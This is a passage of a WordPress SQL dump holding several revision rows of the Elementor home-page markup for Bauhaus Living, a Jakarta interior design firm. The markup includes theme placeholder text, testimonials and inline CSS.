		01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-09-22 08:50:34','2023-09-22 08:50:34','',22,'https://bauhaus.futuremediatrix.com/?p=4868',0,'revision','',0),(4869,3,'2023-09-22 08:50:34','2023-09-22 08:50:34','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927c-scaled.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-1065.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-9402.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								LOREM IPSUM							</h2>\n		<p>WELCOME TO BAUHAUS</p><p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.</p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.</p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\nOur highlighted services\nfor interior design							</h2>\n		Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.		\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why choose ?							</h2>\n							<p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"2560\" height=\"1920\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg 2560w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-300x225.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1024x768.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-768x576.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1536x1152.jpg 1536w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-2048x1536.jpg 2048w\" sizes=\"(max-width: 2560px) 100vw, 2560px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-09-22 08:50:34','2023-09-22 08:50:34','',22,'https://bauhaus.futuremediatrix.com/?p=4869',0,'revision','',0),(4870,3,'2023-09-22 08:50:34','2023-09-22 08:50:34','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927c-scaled.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-1065.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-9402.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								WELCOME TO BAUHAUS							</h2>\n		<p>\"Let\'s turn your ideas into reality\"</p><p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.</p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.</p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\nOur highlighted services\nfor interior design							</h2>\n		Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.		\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why choose ?							</h2>\n							<p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"2560\" height=\"1920\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg 2560w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-300x225.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1024x768.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-768x576.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1536x1152.jpg 1536w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-2048x1536.jpg 2048w\" sizes=\"(max-width: 2560px) 100vw, 2560px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" 